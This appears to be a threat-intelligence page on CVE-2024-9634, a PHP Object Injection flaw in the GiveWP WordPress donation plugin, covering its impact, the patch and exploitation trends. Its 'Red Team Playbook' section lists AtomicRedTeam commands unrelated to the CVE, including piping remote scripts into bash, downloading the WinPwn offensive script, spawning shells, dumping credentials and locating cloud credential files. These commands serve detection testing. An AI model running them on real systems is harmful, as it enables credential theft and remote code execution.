CVE-2024-9634
Overview
This vulnerability is a PHP Object Injection caused by unsafe deserialization of untrusted input within the GiveWP – Donation Plugin and Fundraising Platform for WordPress. The flaw resides in the processing of the give_company_name parameter, which is deserialized without proper validation. This insecure deserialization occurs in versions up to and including 3.16.3, affecting the plugin's donation processing components.
Vulnerability Description
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.3 via deserialization of untrusted input from the give_company_name parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to achieve remote code execution.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP code on the server hosting the GiveWP plugin. This can lead to full system compromise, data theft, or service disruption. No user interaction or authentication is required, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward over the network. The critical severity (CVSS 9.8) reflects the high impact of this flaw in a publicly exposed WordPress environment.
Solution
Update the GiveWP – Donation Plugin to version 3.16.4 or later, where the unsafe deserialization of the give_company_name parameter has been addressed. Refer to the official WordFence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/b8eb3aa9-fe60-48b6-aa24-7873dd68b47e) and the WordPress plugin changelog for detailed patch information. Applying this update removes the vulnerable deserialization code and mitigates the risk of PHP Object Injection.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the GiveWP Donation Plugin and Fundraising Platform for WordPress is characterized by a PHP Object Injection flaw, which arises from the deserialization of untrusted input. Specifically, this vulnerability is triggered through the manipulation of the give_company_name parameter. When an attacker sends crafted input that the application does not properly validate, it allows for the injection of arbitrary PHP objects. This flaw is particularly severe due to the presence of a Property-Oriented Programming (POP) chain, which enables attackers to execute arbitrary code on the server. The potential for remote code execution elevates the risk associated with this vulnerability, making it critical for users of the affected plugin to take immediate action.
Attack vectors for exploiting this vulnerability are relatively straightforward, given that unauthenticated attackers can leverage it without needing any special access or credentials. An attacker could craft a malicious request that includes a specially formatted payload in the give_company_name parameter. Upon receiving this input, the vulnerable application would deserialize the data, leading to the execution of arbitrary PHP code. This could allow the attacker to perform a variety of malicious actions, such as creating new administrative accounts, exfiltrating sensitive data, or even taking complete control of the affected WordPress site. The ease of exploitation, combined with the high impact of the vulnerability, makes it a prime target for attackers seeking to compromise WordPress installations.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the GiveWP plugin for fundraising and donation management. Successful exploitation could lead to unauthorized access to sensitive donor information, financial data, and other critical resources. This not only poses a direct financial risk but also threatens the organization's reputation and trustworthiness. For non-profit organizations, where donor trust is paramount, a breach could result in a loss of funding and support. Additionally, the potential for widespread exploitation means that many organizations using this plugin could be at risk, leading to a broader impact across the WordPress ecosystem.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First and foremost, updating the GiveWP plugin to the latest version is essential, as this will patch the vulnerability and protect against exploitation. Regularly monitoring and auditing web applications for vulnerabilities is also crucial, as it allows organizations to identify and address potential security issues before they can be exploited. Employing web application firewalls (WAFs) can provide an additional layer of defense by filtering out malicious requests before they reach the application. Furthermore, organizations should conduct security awareness training for their staff to ensure they understand the importance of input validation and secure coding practices.
In conclusion, the PHP Object Injection vulnerability in the GiveWP Donation Plugin represents a serious threat to WordPress users, particularly those in the non-profit sector. The potential for remote code execution, combined with the ease of exploitation, necessitates immediate attention from affected organizations. By prioritizing updates, implementing robust security practices, and fostering a culture of security awareness, organizations can significantly reduce their risk and protect their valuable assets from malicious actors.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the PHP Object Injection vulnerability in the GiveWP Donation Plugin. Our telemetry indicates a doubling in detection frequency, signaling increased attacker interest and activity. Although no new exploit variants or proof-of-concept code have surfaced, the sustained rise in exploitation attempts underscores the vulnerability’s attractiveness as a vector for remote code execution. This trend elevates the threat level, particularly for WordPress environments that remain unpatched, as adversaries may be refining their attack chains or expanding targeting scope. Defenders should interpret this surge as a clear indicator of heightened risk, reflecting adversaries’ ongoing efforts to leverage this critical flaw in real-world scenarios.
Update 2 — July 18, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the GiveWP plugin vulnerability, with our telemetry showing a sustained upward trend in attack activity. This increase, while not accompanied by new exploit variants or publicly disclosed proof-of-concept code, suggests adversaries are intensifying their operational focus on this critical flaw. The persistence and growth in exploitation attempts indicate that threat actors may be refining their payload delivery or expanding their targeting strategies, potentially increasing the likelihood of successful remote code execution in vulnerable WordPress environments. Although the EPSS score remains stable, the qualitative surge in attack frequency elevates the overall threat posture, underscoring the urgency for defenders to maintain heightened vigilance. This evolving landscape reflects a growing adversary interest that could presage more sophisticated or widespread exploitation efforts in the near term.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Givewp | Givewp | All |
cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
58%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-9634 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/b8eb3aa9-fe60-48b6-aa24-7873dd68b47e?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/give/tags/3.16.2/src/Donations/Repositories/DonationRepository.php?rev=3157829 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3166836/give/tags/3.16.4/includes/process-donation.php |